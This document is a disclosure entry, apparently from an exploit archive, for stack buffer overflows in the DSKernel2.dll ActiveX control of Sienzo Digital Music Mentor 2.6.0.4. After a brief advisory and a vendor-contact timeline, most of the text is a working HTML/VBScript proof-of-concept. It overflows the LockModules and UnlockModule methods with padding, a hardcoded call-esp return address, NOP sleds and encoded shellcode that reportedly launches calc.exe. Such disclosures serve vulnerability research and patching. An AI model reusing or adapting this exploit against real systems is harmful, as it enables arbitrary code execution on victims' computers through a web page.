Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow

source: https://www.securityfocus.com/bid/23838/info

Sienzo Digital Music Mentor is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to adequately check boundaries on data supplied to multiple ActiveX control methods.

An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.

Digital Music Mentor 2.6.0.4 is vulnerable; other versions may also be affected.

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre>